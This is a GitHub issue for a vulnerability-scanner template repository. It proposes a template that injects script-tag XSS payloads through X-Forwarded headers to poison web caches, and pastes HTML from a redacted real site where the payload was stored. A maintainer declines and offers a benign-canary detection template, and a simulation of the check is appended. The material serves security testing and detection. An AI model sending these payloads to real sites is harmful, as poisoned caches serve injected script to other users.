projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

Cache Poisoning Based Stored XSS #3767

Closed akincibor closed 1 year ago

akincibor commented 2 years ago

Template Information:

The base was taken from id: cache-poisoning, which is just info, but sometimes this can be escalated to stored XSS with severity high.

Nuclei Template:

id: cache-poisoning-stored-xss

info:
  name: Cache Poisoning Based Stored XSS
  author: melbadry9,xelkomy,akincibor
  severity: high
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
  tags: cache,generic

requests:
  - raw:
      - |
        GET /?test=1337 HTTP/1.1
        X-Forwarded-Prefix: cache.example.com"></script><script>alert(document.domain);</script>
        X-Forwarded-Host: cache.example.com"></script><script>alert(document.domain);</script>
        X-Forwarded-For: cache.example.com"></script><script>alert(document.domain);</script>
      - |
        GET /?test=1337 HTTP/1.1
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.example.com")'

This script found stored XSS on a REDACTED domain; here is the source code where it was stored (some are URL encoded). This source code has generated 4 stored XSS.

<link rel="shortcut icon" href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/favicon.ico" type="image/x-icon" />

<meta name="twitter:image" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/img/logo-share.png" />

<meta property="og:image" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/sites/default/themes/dtheme/img/logo-share.png" />

<meta property="og:url" content="https://cache.example.com&quot;&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/home" />

<link type="text/css" rel="stylesheet" media="all" href="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/css/css_cf0bae0e1c3e64e39312e3091903d90b.css" />

<link type="text/css" rel="stylesheet" media="print" href="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/css/css_4a3208b4b932e263e93603b8a01ab85f.css" />

<link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/files/theme/dtheme-direct.css?E" />

  <link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dist/theme.min.css?E">

  <link type="text/css" rel="stylesheet" media="all" href="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dtheme-direct.css?E">

<a href="/script><script>alert(document.domain);</script>, www.REDACTED/" title="Back to home" rel="home"><img src="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/img/logo-theme.svg" alt="REDACTED REDACTED"/></a>

<a href="/script><script>alert(document.domain);</script>, www.REDACTED/" title="Back to home" rel="home">REDACTED REDACTED System of REDACTED</a>

<a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/find/" class="faceted-search-more">

<form action="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/home?destination=taxonomy%2Fterm%2F51%3Fmel%3D10"  accept-charset="UTF-8" method="post" id="user-login-form">

<a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/user/password" title="Request new password via e-mail.">Request new password</a>

<ul class="menu"><li><a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/help" class="menu-help-center">Support portal</a></li><li><a href="/script&gt;&lt;script&gt;alert(document.domain);&lt;/script&gt;, www.REDACTED/user/login" class="menu-login">Log in</a></li></ul>

<script type="text/javascript" src="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/js/js_4b23782d20361e151906c9d68bb785d9.js"></script>

<script src="/script><script>alert(document.domain);</script>, www.REDACTED/sites/default/themes/dtheme/dist/theme.min.js?E" async></script>

<script type="text/javascript" src="https://cache.example.com"></script><script>alert(document.domain);</script>, www.REDACTED/sites/main/files/js/js_83f381503f0e482541af1beab8ddb55d.js"></script>

And some in Drupal settings:

jQuery.extend(Drupal.settings, {"basePath":"\/script\u003e\u003cscript\u003ealert(document.domain);\u003c\/script\u003e,
akincibor commented 2 years ago

We can also add XSS to the tags and maybe optimize the matchers.

tess-ss commented 2 years ago

Hi @akincibor

Thank you for your time and contribution to this project. This seems to be a very good idea to include a template like this in Nuclei, but I am not sure if we can include XSS payloads in the template for testing cache poisoning since it can be potentially impactful.

But I suggest using this template, which is Web cache poisoning with an unkeyed header, which only checks for one header with a normal payload. This will be used only for detection purposes, as issues like this need manual work tested on a unique endpoint which is not visited by normal users :)

id: cache-poisoning-unkeyed-header

info:
  name: Cache Poisoning
  author: melbadry9,xelkomy,akincibor
  severity: low

requests:
  - raw:
      - |
        GET /?mel=9 HTTP/1.1
        X-Forwarded-Prefix: cache.melbadry9.com
        X-Forwarded-Host: cache.melbadry9.com
        X-Forwarded-For: cache.melbadry9.com

      - |
        GET /?mel=9 HTTP/1.1

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "cache.melbadry9.com") == true'

I have tested this template on the Portswigger lab "Lab: Web cache poisoning with an unkeyed header" and the template seems to be working perfectly :) @princechaddha @ehsandeep


Thanks, tess
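To make the two-request logic of both templates above concrete, here is an added toy model (not code from this issue or from the nuclei project): a shared cache keyed only on path and query in front of an origin that reflects X-Forwarded-Host, with the same benign canary approach tess-ss suggests. The canary value, hostnames and the Origin/Cache classes are constructed for illustration; the check returns true only when body_2 (the clean follow-up request) still carries the canary, and the keyed-cache and non-reflecting variants show the two fixes.

```python
"""Toy model of the unkeyed-header cache poisoning check (constructed example)."""

CANARY = "cache.canary.invalid"  # constructed benign marker, not an XSS payload
DEFAULT_HOST = "www.example.invalid"  # constructed origin hostname


class Origin:
    """Origin that builds absolute URLs from X-Forwarded-Host when trust is on."""

    def __init__(self, trust_forwarded_host):
        self.trust_forwarded_host = trust_forwarded_host

    def handle(self, path, headers):
        host = DEFAULT_HOST
        if self.trust_forwarded_host:
            host = headers.get("X-Forwarded-Host", DEFAULT_HOST)
        # Mirrors the og:url / stylesheet hrefs seen in the issue: the header
        # value lands in the HTML body that the cache will store.
        return '<meta property="og:url" content="https://%s%s" />' % (host, path)


class Cache:
    """Shared cache; with vary_on_header the key also includes X-Forwarded-Host."""

    def __init__(self, origin, vary_on_header=False):
        self.origin, self.vary, self.store = origin, vary_on_header, {}

    def get(self, path, headers=None):
        headers = headers or {}
        key = (path, headers.get("X-Forwarded-Host") if self.vary else None)
        if key not in self.store:  # miss: fetch from origin and store
            self.store[key] = self.origin.handle(path, headers)
        return self.store[key]


def unkeyed_header_check(cache, path="/?mel=9"):
    """Request 1 carries the canary headers, request 2 is identical but clean.
    Equivalent of contains(body_2, CANARY) in the template's DSL matcher."""
    poison = {"X-Forwarded-Prefix": CANARY, "X-Forwarded-Host": CANARY,
              "X-Forwarded-For": CANARY}
    cache.get(path, poison)        # body_1: may reflect the canary
    body_2 = cache.get(path)       # body_2: served to the next visitor
    return CANARY in body_2


def run_scenarios():
    """Vulnerable setup versus the two mitigations: key on the header, or stop trusting it."""
    return {
        "reflects_and_unkeyed": unkeyed_header_check(Cache(Origin(True))),
        "reflects_but_keyed": unkeyed_header_check(Cache(Origin(True), vary_on_header=True)),
        "ignores_header": unkeyed_header_check(Cache(Origin(False))),
    }
```

Only the first scenario reports a hit, which is why the template uses a unique query string: the poisoned entry is confined to a URL real users never request.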